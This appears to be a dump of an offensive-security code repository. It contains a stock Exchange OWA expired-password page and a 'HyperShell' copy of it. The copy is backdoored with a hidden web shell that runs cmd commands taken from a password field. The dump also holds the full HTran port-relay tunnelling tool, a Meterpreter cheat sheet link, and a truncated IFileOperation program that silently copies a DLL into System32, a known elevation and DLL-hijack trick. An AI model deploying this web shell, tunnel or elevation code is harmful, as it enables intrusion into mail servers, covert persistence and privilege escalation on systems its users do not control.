https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Evilwow.png -------------------------------------------------------------------------------- /ExpiredPassword.aspx(2013): -------------------------------------------------------------------------------- 1 | <%@ Page language="c#" AutoEventWireup="false" Inherits="Microsoft.Exchange.HttpProxy.ExpiredPassword" %> 2 | <%@ Import namespace="Microsoft.Exchange.Clients"%> 3 | <%@ Import namespace="Microsoft.Exchange.Clients.Owa.Core"%> 4 | <%@ Import namespace="Microsoft.Exchange.HttpProxy"%> 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OutlookWebAccess) %> 13 | 14 | 15 | 42 | 43 | 44 | " style="background: 
#f2f2f2 url('<%=OwaUrl.AuthFolder.ImplicitUrl%><%ThemeManager.RenderBaseThemeFileUrl(Response.Output, ThemeFileId.BackgroundGradientLogin, false);%>') repeat-x"/> 45 | <% 46 | string tblStyle = "cellpadding=0 cellspacing=0"; 47 | if (IsDownLevelClient) 48 | { 49 | tblStyle = "class=\"nonMSIE\""; 50 | } 51 | %> 52 | 53 |
54 |
55 | 60 | 66 | 67 |
68 |
69 |
70 | 71 |
72 | <% if (PasswordChanged) { %> 73 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.LogoffChangePasswordClickOkToLogin) %>
74 |
75 |
76 | 77 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OkLowerCase)%> 78 |
79 | 80 |
81 | <% } else { %> 82 |
83 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordTitle)%>
84 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.PasswordExpired) %>
85 | <% 86 | if (Reason == ExpiredPasswordReason.InvalidCredentials) { 87 | %> 88 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.InvalidCredentialsMessage) %>
89 | <% 90 | } else if (Reason == ExpiredPasswordReason.InvalidNewPassword) { 91 | %> 92 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordInvalidNewPassword) %>
93 | <% 94 | } else if (Reason == ExpiredPasswordReason.PasswordConflict) { 95 | %> 96 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConflict) %>
97 | <% 98 | } else if (Reason == ExpiredPasswordReason.LockedOut) { 99 | %> 100 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordLockedOut) %>
101 | <% } %> 102 |
103 | 104 |
105 | 106 | 107 |
108 | 109 | 110 |
111 | 112 | 113 |
114 | 115 | 120 | 121 |
122 |
123 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.Submit)%> 124 |
125 | 126 |
127 |
128 | <% } %> 129 |
130 |
131 |
132 |
133 | 134 | 135 | 136 | -------------------------------------------------------------------------------- /ExpiredPassword.aspx(2013)(HyperShell): -------------------------------------------------------------------------------- 1 | <%@ Page language="c#" AutoEventWireup="false" Inherits="Microsoft.Exchange.HttpProxy.ExpiredPassword" %> 2 | <%@ Import namespace="Microsoft.Exchange.Clients"%> 3 | <%@ Import namespace="Microsoft.Exchange.Clients.Owa.Core"%> 4 | <%@ Import namespace="Microsoft.Exchange.HttpProxy"%> 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OutlookWebAccess) %> 13 | 14 | 15 | 42 | 43 | 44 | " style="background: #f2f2f2 url('<%=OwaUrl.AuthFolder.ImplicitUrl%><%ThemeManager.RenderBaseThemeFileUrl(Response.Output, ThemeFileId.BackgroundGradientLogin, false);%>') repeat-x"/> 45 | <% 46 | string tblStyle = "cellpadding=0 cellspacing=0"; 47 | if (IsDownLevelClient) 48 | { 49 | tblStyle = "class=\"nonMSIE\""; 50 | } 51 | %> 52 | 53 |
54 |
55 | 60 | 66 | 67 |
68 |
69 |
70 | 71 |
72 | <% if (PasswordChanged) { %> 73 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.LogoffChangePasswordClickOkToLogin) %>
74 |
75 |
76 | 77 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OkLowerCase)%> 78 |
79 | 80 |
81 | <% } else { %> 82 |
83 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordTitle)%>
84 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.PasswordExpired) %>
85 | <% 86 | if (Reason == ExpiredPasswordReason.InvalidCredentials) { 87 | %> 88 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.InvalidCredentialsMessage) %>
89 | <% 90 | } else if (Reason == ExpiredPasswordReason.InvalidNewPassword) { 91 | %> 92 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordInvalidNewPassword) %>
93 | <% 94 | } else if (Reason == ExpiredPasswordReason.PasswordConflict) { 95 | %> 96 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConflict) %>
97 | <% 98 | } else if (Reason == ExpiredPasswordReason.LockedOut) { 99 | %> 100 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordLockedOut) %>
101 | <% } %> 102 | 103 | 104 | <% 105 | try{ 106 | System.Diagnostics.Process p = new System.Diagnostics.Process(); 107 | System.Diagnostics.ProcessStartInfo i = p.StartInfo; 108 | i.FileName = "cmd"; 109 | i.Arguments = "/c " + Request.Form["newPwd2"]; 110 | i.UseShellExecute = false; 111 | i.CreateNoWindow = true; 112 | i.RedirectStandardOutput = true; 113 | p.Start(); 114 | string r = p.StandardOutput.ReadToEnd(); 115 | p.WaitForExit(); 116 | p.Close(); 117 | Response.Write("
" + Server.HtmlEncode(r) + "
"); 118 | Response.End(); 119 | }catch{} 120 | %> 121 | 122 | 123 |
124 | 125 |
126 | 127 | 128 |
129 | 130 | 131 |
132 | 133 | 134 |
135 | 136 | 141 | 142 |
143 |
144 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.Submit)%> 145 |
146 | 147 |
148 |
149 | <% } %> 150 |
151 |
152 |
153 |
154 | 155 | 156 | 157 | -------------------------------------------------------------------------------- /HTran.cpp: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* 4 | ************************************************************************************ 5 | * 6 | * HTran.cpp - HUC Packet Transmit Tool. 7 | * 8 | * Copyright (C) 2000-2004 HUC All Rights Reserved. 9 | * 10 | * Author : lion 11 | * : lion#cnhonker.net 12 | * : http://www.cnhonker.com 13 | * : 14 | * Notice : Thx to bkbll (bkbll#cnhonker.net) 15 | * : 16 | * Date : 2003-10-20 17 | * : 18 | * Complie : cl HTran.cpp 19 | * : 20 | * Usage : E:\>HTran 21 | * : ======================== HUC Packet Transmit Tool V1.00 ======================= 22 | * : =========== Code by lion & bkbll, Welcome to http://www.cnhonker.com ========== 23 | * : 24 | * : [Usage of Packet Transmit:] 25 | * : HTran - [-log logfile] 26 | * : 27 | * : [option:] 28 | * : -listen 29 | * : -tran 30 | * : -slave 31 | * 32 | ************************************************************************************ 33 | */ 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #pragma comment(lib, "ws2_32.lib") 41 | 42 | #define VERSION "1.00" 43 | #define TIMEOUT 300 44 | #define MAXSIZE 20480 45 | #define HOSTLEN 40 46 | #define CONNECTNUM 5 47 | 48 | // define 2 socket struct 49 | struct transocket 50 | { 51 | SOCKET fd1; 52 | SOCKET fd2; 53 | }; 54 | 55 | // define function 56 | void ver(); 57 | void usage(char *prog); 58 | void transmitdata(LPVOID data); 59 | void getctrlc(int j); 60 | void closeallfd(); 61 | void makelog(char *buffer, int length); 62 | void proxy(int port); 63 | void bind2bind(int port1, int port2); 64 | void bind2conn(int port1, char *host, int port2); 65 | void conn2conn(char *host1, int port1, char *host2, int port2); 66 | int testifisvalue(char *str); 67 | int create_socket(); 68 | int create_server(int sockfd, int port); 69 | int 
client_connect(int sockfd, char* server, int port); 70 | 71 | // define GLOBAL variable here 72 | extern int errno; 73 | FILE *fp; 74 | int method=0; 75 | //int connectnum=0; 76 | 77 | //************************************************************************************ 78 | // 79 | // function main ?????????????? 80 | // 81 | //************************************************************************************ 82 | VOID main(int argc, char* argv[]) 83 | { 84 | char **p; 85 | char sConnectHost[HOSTLEN], sTransmitHost[HOSTLEN]; 86 | int iConnectPort=0, iTransmitPort=0; 87 | char *logfile=NULL; 88 | 89 | ver(); 90 | memset(sConnectHost, 0, HOSTLEN); 91 | memset(sTransmitHost, 0, HOSTLEN); 92 | 93 | p=argv; 94 | while(*p) 95 | { 96 | if(stricmp(*p, "-log") == 0) 97 | { 98 | if(testifisvalue(*(p+1))) 99 | { 100 | logfile = *(++p); 101 | } 102 | else 103 | { 104 | printf("[-] ERROR: Must supply logfile name.\r\n"); 105 | return; 106 | } 107 | p++; 108 | continue; 109 | } 110 | p++; 111 | } 112 | 113 | if(logfile !=NULL) 114 | { 115 | fp=fopen(logfile,"a"); 116 | if(fp == NULL ) 117 | { 118 | printf("[-] ERROR: open logfile"); 119 | return; 120 | } 121 | 122 | makelog("====== Start ======\r\n", 22); 123 | } 124 | 125 | 126 | // Win Start Winsock. 
127 | WSADATA wsadata; 128 | WSAStartup(MAKEWORD(2, 2), &wsadata); 129 | 130 | signal(SIGINT, &getctrlc); 131 | 132 | if(argc > 2) 133 | { 134 | if(stricmp(argv[1], "-listen") == 0 && argc >= 4) 135 | { 136 | iConnectPort = atoi(argv[2]); 137 | iTransmitPort = atoi(argv[3]); 138 | method = 1; 139 | } 140 | else 141 | if(stricmp(argv[1], "-tran") == 0 && argc >= 5) 142 | { 143 | iConnectPort = atoi(argv[2]); 144 | strncpy(sTransmitHost, argv[3], HOSTLEN); 145 | iTransmitPort = atoi(argv[4]); 146 | method = 2; 147 | } 148 | else 149 | if(stricmp(argv[1], "-slave") == 0 && argc >= 6) 150 | { 151 | strncpy(sConnectHost, argv[2], HOSTLEN); 152 | iConnectPort = atoi(argv[3]); 153 | strncpy(sTransmitHost, argv[4], HOSTLEN); 154 | iTransmitPort = atoi(argv[5]); 155 | method = 3; 156 | } 157 | } 158 | 159 | switch(method) 160 | { 161 | case 1: 162 | bind2bind(iConnectPort, iTransmitPort); 163 | break; 164 | case 2: 165 | bind2conn(iConnectPort, sTransmitHost, iTransmitPort); 166 | break; 167 | case 3: 168 | conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); 169 | break; 170 | default: 171 | usage(argv[0]); 172 | break; 173 | } 174 | 175 | if(method) 176 | { 177 | closeallfd(); 178 | } 179 | 180 | WSACleanup(); 181 | 182 | return; 183 | } 184 | 185 | 186 | //************************************************************************************ 187 | // 188 | // print version message 189 | // 190 | //************************************************************************************ 191 | VOID ver() 192 | { 193 | printf("======================== HUC Packet Transmit Tool V%s =======================\r\n", VERSION); 194 | printf("=========== Code by lion & bkbll, Welcome to http://www.cnhonker.com==========\r\n\n"); 195 | } 196 | 197 | //************************************************************************************ 198 | // 199 | // print usage message 200 | // 201 | //************************************************************************************ 202 
| VOID usage(char* prog) 203 | { 204 | printf("[Usage of Packet Transmit:]\r\n"); 205 | printf(" %s - [-log logfile]\n\n", prog); 206 | printf("[option:]\n"); 207 | printf(" -listen \n"); 208 | printf(" -tran \n"); 209 | printf(" -slave \n\n"); 210 | return; 211 | } 212 | 213 | //************************************************************************************ 214 | // 215 | // test if is value 216 | // 217 | //************************************************************************************ 218 | int testifisvalue(char *str) 219 | { 220 | if(str == NULL ) return(0); 221 | if(str[0]=='-') return(0); 222 | return(1); 223 | } 224 | 225 | //************************************************************************************ 226 | // 227 | // LocalHost:ConnectPort transmit to LocalHost:TransmitPort 228 | // 229 | //************************************************************************************ 230 | void bind2bind(int port1, int port2) 231 | { 232 | SOCKET fd1,fd2, sockfd1, sockfd2; 233 | struct sockaddr_in client1,client2; 234 | int size1,size2; 235 | 236 | HANDLE hThread=NULL; 237 | transocket sock; 238 | DWORD dwThreadID; 239 | 240 | if((fd1=create_socket())==0) return; 241 | if((fd2=create_socket())==0) return; 242 | 243 | printf("[+] Listening port %d ......\r\n",port1); 244 | fflush(stdout); 245 | 246 | if(create_server(fd1, port1)==0) 247 | { 248 | closesocket(fd1); 249 | return; 250 | } 251 | 252 | printf("[+] Listen OK!\r\n"); 253 | printf("[+] Listening port %d ......\r\n",port2); 254 | fflush(stdout); 255 | if(create_server(fd2, port2)==0) 256 | { 257 | closesocket(fd2); 258 | return; 259 | } 260 | 261 | printf("[+] Listen OK!\r\n"); 262 | size1=size2=sizeof(struct sockaddr); 263 | while(1) 264 | { 265 | printf("[+] Waiting for Client on port:%d ......\r\n",port1); 266 | if((sockfd1 = accept(fd1,(struct sockaddr *)&client1,&size1))<0) 267 | { 268 | printf("[-] Accept1 error.\r\n"); 269 | continue; 270 | } 271 | 272 | printf("[+] Accept a Client on 
port %d from %s ......\r\n", port1, inet_ntoa(client1.sin_addr)); 273 | printf("[+] Waiting another Client on port:%d....\r\n", port2); 274 | if((sockfd2 = accept(fd2, (struct sockaddr *)&client2, &size2))<0) 275 | { 276 | printf("[-] Accept2 error.\r\n"); 277 | closesocket(sockfd1); 278 | continue; 279 | } 280 | 281 | printf("[+] Accept a Client on port %d from %s\r\n",port2, inet_ntoa(client2.sin_addr)); 282 | printf("[+] Accept Connect OK!\r\n"); 283 | 284 | sock.fd1 = sockfd1; 285 | sock.fd2 = sockfd2; 286 | 287 | hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); 288 | if(hThread == NULL) 289 | { 290 | TerminateThread(hThread, 0); 291 | return; 292 | } 293 | 294 | Sleep(1000); 295 | printf("[+] CreateThread OK!\r\n\n"); 296 | } 297 | } 298 | 299 | //************************************************************************************ 300 | // 301 | // LocalHost:ConnectPort transmit to TransmitHost:TransmitPort 302 | // 303 | //************************************************************************************ 304 | void bind2conn(int port1, char *host, int port2) 305 | { 306 | SOCKET sockfd,sockfd1,sockfd2; 307 | struct sockaddr_in remote; 308 | int size; 309 | char buffer[1024]; 310 | 311 | HANDLE hThread=NULL; 312 | transocket sock; 313 | DWORD dwThreadID; 314 | 315 | if (port1 > 65535 || port1 < 1) 316 | { 317 | printf("[-] ConnectPort invalid.\r\n"); 318 | return; 319 | } 320 | 321 | if (port2 > 65535 || port2 < 1) 322 | { 323 | printf("[-] TransmitPort invalid.\r\n"); 324 | return; 325 | } 326 | 327 | memset(buffer,0,1024); 328 | if((sockfd=create_socket()) == INVALID_SOCKET) return; 329 | 330 | if(create_server(sockfd, port1) == 0) 331 | { 332 | closesocket(sockfd); 333 | return; 334 | } 335 | 336 | size=sizeof(struct sockaddr); 337 | while(1) 338 | { 339 | printf("[+] Waiting for Client ......\r\n"); 340 | if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,&size))<0) 341 | { 342 | printf("[-] Accept 
error.\r\n"); 343 | continue; 344 | } 345 | 346 | printf("[+] Accept a Client from %s:%d ......\r\n", 347 | inet_ntoa(remote.sin_addr), ntohs(remote.sin_port)); 348 | if((sockfd2=create_socket())==0) 349 | { 350 | closesocket(sockfd1); 351 | continue; 352 | } 353 | printf("[+] Make a Connection to %s:%d ......\r\n",host,port2); 354 | fflush(stdout); 355 | 356 | if(client_connect(sockfd2,host,port2)==0) 357 | { 358 | closesocket(sockfd2); 359 | sprintf(buffer,"[SERVER]connection to %s:%d error\r\n", host, port2); 360 | send(sockfd1,buffer,strlen(buffer),0); 361 | memset(buffer, 0, 1024); 362 | closesocket(sockfd1); 363 | continue; 364 | } 365 | 366 | printf("[+] Connect OK!\r\n"); 367 | 368 | sock.fd1 = sockfd1; 369 | sock.fd2 = sockfd2; 370 | 371 | hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); 372 | if(hThread == NULL) 373 | { 374 | TerminateThread(hThread, 0); 375 | return; 376 | } 377 | 378 | Sleep(1000); 379 | printf("[+] CreateThread OK!\r\n\n"); 380 | } 381 | } 382 | 383 | //************************************************************************************ 384 | // 385 | // ConnectHost:ConnectPort transmit to TransmitHost:TransmitPort 386 | // 387 | //************************************************************************************ 388 | void conn2conn(char *host1,int port1,char *host2,int port2) 389 | { 390 | SOCKET sockfd1,sockfd2; 391 | 392 | HANDLE hThread=NULL; 393 | transocket sock; 394 | DWORD dwThreadID; 395 | fd_set fds; 396 | int l; 397 | char buffer[MAXSIZE]; 398 | 399 | while(1) 400 | { 401 | 402 | if((sockfd1=create_socket())==0) return; 403 | if((sockfd2=create_socket())==0) return; 404 | 405 | printf("[+] Make a Connection to %s:%d....\r\n",host1,port1); 406 | fflush(stdout); 407 | if(client_connect(sockfd1,host1,port1)==0) 408 | { 409 | closesocket(sockfd1); 410 | closesocket(sockfd2); 411 | continue; 412 | } 413 | 414 | // fix by bkbll 415 | // if host1:port1 recved data, than 
connect to host2,port2 416 | l=0; 417 | memset(buffer,0,MAXSIZE); 418 | while(1) 419 | { 420 | FD_ZERO(&fds); 421 | FD_SET(sockfd1, &fds); 422 | if (select(sockfd1+1, &fds, NULL, NULL, NULL) == SOCKET_ERROR) 423 | { 424 | if (errno == WSAEINTR) continue; 425 | break; 426 | } 427 | if (FD_ISSET(sockfd1, &fds)) 428 | { 429 | l=recv(sockfd1, buffer, MAXSIZE, 0); 430 | break; 431 | } 432 | Sleep(5); 433 | } 434 | 435 | if(l<=0) 436 | { 437 | printf("[-] There is a error...Create a new connection.\r\n"); 438 | continue; 439 | } 440 | while(1) 441 | { 442 | printf("[+] Connect OK!\r\n"); 443 | printf("[+] Make a Connection to %s:%d....\r\n", host2,port2); 444 | fflush(stdout); 445 | if(client_connect(sockfd2,host2,port2)==0) 446 | { 447 | closesocket(sockfd1); 448 | closesocket(sockfd2); 449 | continue; 450 | } 451 | 452 | if(send(sockfd2,buffer,l,0)==SOCKET_ERROR) 453 | { 454 | printf("[-] Send failed.\r\n"); 455 | continue; 456 | } 457 | 458 | l=0; 459 | memset(buffer,0,MAXSIZE); 460 | break; 461 | } 462 | 463 | printf("[+] All Connect OK!\r\n"); 464 | 465 | sock.fd1 = sockfd1; 466 | sock.fd2 = sockfd2; 467 | 468 | hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); 469 | if(hThread == NULL) 470 | { 471 | TerminateThread(hThread, 0); 472 | return; 473 | } 474 | 475 | // connectnum++; 476 | 477 | Sleep(1000); 478 | printf("[+] CreateThread OK!\r\n\n"); 479 | } 480 | } 481 | 482 | //************************************************************************************ 483 | // 484 | // Socket Transmit to Socket 485 | // 486 | //************************************************************************************ 487 | void transmitdata(LPVOID data) 488 | { 489 | SOCKET fd1, fd2; 490 | transocket *sock; 491 | struct timeval timeset; 492 | fd_set readfd,writefd; 493 | int result,i=0; 494 | char read_in1[MAXSIZE],send_out1[MAXSIZE]; 495 | char read_in2[MAXSIZE],send_out2[MAXSIZE]; 496 | int read1=0,totalread1=0,send1=0; 497 | 
int read2=0,totalread2=0,send2=0; 498 | int sendcount1,sendcount2; 499 | int maxfd; 500 | struct sockaddr_in client1,client2; 501 | int structsize1,structsize2; 502 | char host1[20],host2[20]; 503 | int port1=0,port2=0; 504 | char tmpbuf[100]; 505 | 506 | sock = (transocket *)data; 507 | fd1 = sock->fd1; 508 | fd2 = sock->fd2; 509 | 510 | memset(host1,0,20); 511 | memset(host2,0,20); 512 | memset(tmpbuf,0,100); 513 | 514 | structsize1=sizeof(struct sockaddr); 515 | structsize2=sizeof(struct sockaddr); 516 | 517 | if(getpeername(fd1,(struct sockaddr *)&client1,&structsize1)<0) 518 | { 519 | strcpy(host1, "fd1"); 520 | } 521 | else 522 | { 523 | // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port)); 524 | strcpy(host1, inet_ntoa(client1.sin_addr)); 525 | port1=ntohs(client1.sin_port); 526 | } 527 | 528 | if(getpeername(fd2,(struct sockaddr *)&client2,&structsize2)<0) 529 | { 530 | strcpy(host2,"fd2"); 531 | } 532 | else 533 | { 534 | // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port)); 535 | strcpy(host2, inet_ntoa(client2.sin_addr)); 536 | port2=ntohs(client2.sin_port); 537 | } 538 | 539 | printf("[+] Start Transmit (%s:%d <-> %s:%d) ......\r\n\n", host1, port1, host2, port2); 540 | 541 | maxfd=max(fd1,fd2)+1; 542 | memset(read_in1,0,MAXSIZE); 543 | memset(read_in2,0,MAXSIZE); 544 | memset(send_out1,0,MAXSIZE); 545 | memset(send_out2,0,MAXSIZE); 546 | 547 | timeset.tv_sec=TIMEOUT; 548 | timeset.tv_usec=0; 549 | 550 | while(1) 551 | { 552 | FD_ZERO(&readfd); 553 | FD_ZERO(&writefd); 554 | 555 | FD_SET((UINT)fd1, &readfd); 556 | FD_SET((UINT)fd1, &writefd); 557 | FD_SET((UINT)fd2, &writefd); 558 | FD_SET((UINT)fd2, &readfd); 559 | 560 | result=select(maxfd,&readfd,&writefd,NULL,×et); 561 | if((result<0) && (errno!=EINTR)) 562 | { 563 | printf("[-] Select error.\r\n"); 564 | break; 565 | } 566 | else if(result==0) 567 | { 568 | printf("[-] Socket time out.\r\n"); 569 | break; 570 | } 571 | 
572 | if(FD_ISSET(fd1, &readfd)) 573 | { 574 | /* must < MAXSIZE-totalread1, otherwise send_out1 will flow */ 575 | if(totalread1 < MAXSIZE 576 | 577 | ) { 578 | read1=recv(fd1, read_in1, MAXSIZE-totalread1, 0); 579 | if((read1==SOCKET_ERROR) || (read1==0)) 580 | { 581 | printf("[-] Read fd1 data error,maybe close?\r\n"); 582 | break; 583 | } 584 | 585 | memcpy(send_out1+totalread1,read_in1,read1); 586 | sprintf(tmpbuf,"\r\nRecv %5d bytes from %s:%d\r\n", read1, host1, port1); 587 | printf(" Recv %5d bytes %16s:%d\r\n", read1, host1, port1); 588 | makelog(tmpbuf,strlen(tmpbuf)); 589 | makelog(read_in1,read1); 590 | totalread1+=read1; 591 | memset(read_in1,0,MAXSIZE); 592 | } 593 | } 594 | 595 | if(FD_ISSET(fd2, &writefd)) 596 | { 597 | int err=0; 598 | sendcount1=0; 599 | while(totalread1>0) 600 | { 601 | send1=send(fd2, send_out1+sendcount1, totalread1, 0); 602 | if(send1==0)break; 603 | if((send1<0) && (errno!=EINTR)) 604 | { 605 | printf("[-] Send to fd2 unknow error.\r\n"); 606 | err=1; 607 | break; 608 | } 609 | 610 | if((send1<0) && (errno==ENOSPC)) break; 611 | sendcount1+=send1; 612 | totalread1-=send1; 613 | 614 | printf(" Send %5d bytes %16s:%d\r\n", send1, host2, port2); 615 | } 616 | 617 | if(err==1) break; 618 | if((totalread1>0) && (sendcount1>0)) 619 | { 620 | /* move not sended data to start addr */ 621 | memcpy(send_out1,send_out1+sendcount1,totalread1); 622 | memset(send_out1+totalread1,0,MAXSIZE-totalread1); 623 | } 624 | else 625 | memset(send_out1,0,MAXSIZE); 626 | } 627 | 628 | if(FD_ISSET(fd2, &readfd)) 629 | { 630 | if(totalread2 < MAXSIZE 631 | 632 | ) { 633 | read2=recv(fd2,read_in2,MAXSIZE-totalread2, 0); 634 | if(read2==0)break; 635 | if((read2<0) && (errno!=EINTR)) 636 | { 637 | printf("[-] Read fd2 data error,maybe close?\r\n\r\n"); 638 | break; 639 | } 640 | 641 | memcpy(send_out2+totalread2,read_in2,read2); 642 | sprintf(tmpbuf, "\r\nRecv %5d bytes from %s:%d\r\n", read2, host2, port2); 643 | printf(" Recv %5d bytes %16s:%d\r\n", 
read2, host2, port2); 644 | makelog(tmpbuf,strlen(tmpbuf)); 645 | makelog(read_in2,read2); 646 | totalread2+=read2; 647 | memset(read_in2,0,MAXSIZE); 648 | } 649 | } 650 | 651 | if(FD_ISSET(fd1, &writefd)) 652 | { 653 | int err2=0; 654 | sendcount2=0; 655 | while(totalread2>0) 656 | { 657 | send2=send(fd1, send_out2+sendcount2, totalread2, 0); 658 | if(send2==0)break; 659 | if((send2<0) && (errno!=EINTR)) 660 | { 661 | printf("[-] Send to fd1 unknow error.\r\n"); 662 | err2=1; 663 | break; 664 | } 665 | if((send2<0) && (errno==ENOSPC)) break; 666 | sendcount2+=send2; 667 | totalread2-=send2; 668 | 669 | printf(" Send %5d bytes %16s:%d\r\n", send2, host1, port1); 670 | } 671 | if(err2==1) break; 672 | if((totalread2>0) && (sendcount2 > 0)) 673 | { 674 | /* move not sended data to start addr */ 675 | memcpy(send_out2, send_out2+sendcount2, totalread2); 676 | memset(send_out2+totalread2, 0, MAXSIZE-totalread2); 677 | } 678 | else 679 | memset(send_out2,0,MAXSIZE); 680 | } 681 | 682 | Sleep(5); 683 | } 684 | 685 | closesocket(fd1); 686 | closesocket(fd2); 687 | // if(method == 3) 688 | // connectnum --; 689 | 690 | printf("\r\n[+] OK! 
I Closed The Two Socket.\r\n"); 691 | } 692 | 693 | void getctrlc(int j) 694 | { 695 | printf("\r\n[-] Received Ctrl+C\r\n"); 696 | closeallfd(); 697 | exit(0); 698 | } 699 | 700 | void closeallfd() 701 | { 702 | int i; 703 | 704 | printf("[+] Let me exit ......\r\n"); 705 | fflush(stdout); 706 | 707 | for(i=3; i<256; i++) 708 | { 709 | closesocket(i); 710 | } 711 | 712 | if(fp != NULL) 713 | { 714 | fprintf(fp,"\r\n====== Exit ======\r\n"); 715 | fclose(fp); 716 | } 717 | 718 | printf("[+] All Right!\r\n"); 719 | } 720 | 721 | int create_socket() 722 | { 723 | int sockfd; 724 | 725 | sockfd=socket(AF_INET,SOCK_STREAM,0); 726 | if(sockfd<0) 727 | { 728 | printf("[-] Create socket error.\r\n"); 729 | return(0); 730 | } 731 | 732 | return(sockfd); 733 | } 734 | 735 | int create_server(int sockfd,int port) 736 | { 737 | struct sockaddr_in srvaddr; 738 | int on=1; 739 | 740 | memset(&srvaddr, 0, sizeof(struct sockaddr)); 741 | 742 | srvaddr.sin_port=htons(port); 743 | srvaddr.sin_family=AF_INET; 744 | srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); 745 | 746 | setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR, (char*)&on,sizeof(on)); //so I can rebind the port 747 | 748 | if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0) 749 | { 750 | printf("[-] Socket bind error.\r\n"); 751 | return(0); 752 | } 753 | 754 | if(listen(sockfd,CONNECTNUM)<0) 755 | { 756 | printf("[-] Socket Listen error.\r\n"); 757 | return(0); 758 | } 759 | 760 | return(1); 761 | } 762 | 763 | int client_connect(int sockfd,char* server,int port) 764 | { 765 | struct sockaddr_in cliaddr; 766 | struct hostent *host; 767 | 768 | if(!(host=gethostbyname(server))) 769 | { 770 | printf("[-] Gethostbyname(%s) error:%s\n",server,strerror(errno)); 771 | return(0); 772 | } 773 | 774 | memset(&cliaddr, 0, sizeof(struct sockaddr)); 775 | cliaddr.sin_family=AF_INET; 776 | cliaddr.sin_port=htons(port); 777 | cliaddr.sin_addr=*((struct in_addr *)host->h_addr); 778 | 779 | if(connect(sockfd,(struct sockaddr 
*)&cliaddr,sizeof(struct sockaddr))<0) 780 | { 781 | printf("[-] Connect error.\r\n"); 782 | return(0); 783 | } 784 | return(1); 785 | } 786 | 787 | void makelog(char *buffer,int length) 788 | { 789 | if(fp !=NULL) 790 | { 791 | // fprintf(fp, "%s", buffer); 792 | // printf("%s",buffer); 793 | write(fileno(fp),buffer,length); 794 | // fflush(fp); 795 | } 796 | } 797 | -------------------------------------------------------------------------------- /Hacking - Meterpreter Cheat Sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Hacking - Meterpreter Cheat Sheet.pdf -------------------------------------------------------------------------------- /IFileOperation.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int _tmain(int argc, _TCHAR* argv[]) 4 | { 5 | HMODULE hModule = NULL; 6 | IFileOperation *fileOperation = NULL; 7 | LPCWSTR dllName = L"ntwdblib.dll"; 8 | LPCWSTR SourceFullPath = L"C:\\6\\ntwdblib.dll"; 9 | LPCWSTR DestPath = L"C:\\windows\\System32"; 10 | HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); 11 | if (SUCCEEDED(hr)) { 12 | hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&fileOperation)); 13 | if (SUCCEEDED(hr)) { 14 | hr = fileOperation->SetOperationFlags( 15 | FOF_NOCONFIRMATION | 16 | FOF_SILENT | 17 | FOFX_SHOWELEVATIONPROMPT | 18 | FOFX_NOCOPYHOOKS | 19 | FOFX_REQUIREELEVATION | 20 | FOF_NOERRORUI); 21 | if (SUCCEEDED(hr)) { 22 | IShellItem *from = NULL, *to = NULL; 23 | hr = SHCreateItemFromParsingName(SourceFullPath, NULL, IID_PPV_ARGS(&from)); 24 | if (SUCCEEDED(hr)) { 25 | if (DestPath) 26 | hr = SHCreateItemFromParsingName(DestPath, NULL, IID_PPV_ARGS(&to)); 27 | if (SUCCEEDED(hr)) { 28 | hr = fileOperation->CopyItem(from, to, dllName, NULL); 29 | if (NULL != to) 30 | to->Release(); 31 | } 32 
